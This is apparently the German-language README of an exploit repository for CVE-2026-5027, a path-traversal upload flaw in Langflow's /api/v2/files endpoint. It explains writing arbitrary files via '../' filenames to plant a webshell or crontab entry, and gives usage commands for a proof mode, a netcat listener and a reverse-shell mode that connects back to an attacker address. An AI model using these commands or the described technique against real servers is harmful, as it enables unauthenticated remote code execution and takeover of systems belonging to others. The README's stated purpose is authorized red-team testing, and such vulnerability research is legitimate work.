
CVE-2026-5027
Beliebiger Datei-Schreibzugriff bis zur RCE
Nicht authentifizierte Remote-Codeausführung über Datei-Upload
Langflow ist anfällig für eine kritische Path-Traversal-Schwachstelle im Datei-Upload-Endpunkt (POST /api/v2/files).
Ein Angreifer kann einen manipulierten Dateinamen mit ../-Sequenzen senden, um beliebige Dateien an beliebiger Stelle im Dateisystem des Servers zu schreiben.
Dies führt leicht zu vollständiger Remote-Codeausführung (RCE) – beispielsweise durch Ablegen einer Webshell oder Einschleusen in die Crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Erwartete Ausgabe, falls verwundbar:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| Datei | Beschreibung |
|---|---|
CVE-2026-5027.py | Haupt-Python-Exploit (PoC + RCE) |
CVE-2026-5027.yaml | Nuclei-Template zum Scannen |
README.md | Diese Datei |
Proof-Modus
python3 CVE-2026-5027.py -t http://target.com/ --proof
Reverse-Shell-Modus
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken.
Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
Mit ❤️ gemacht für die Red-Team-Community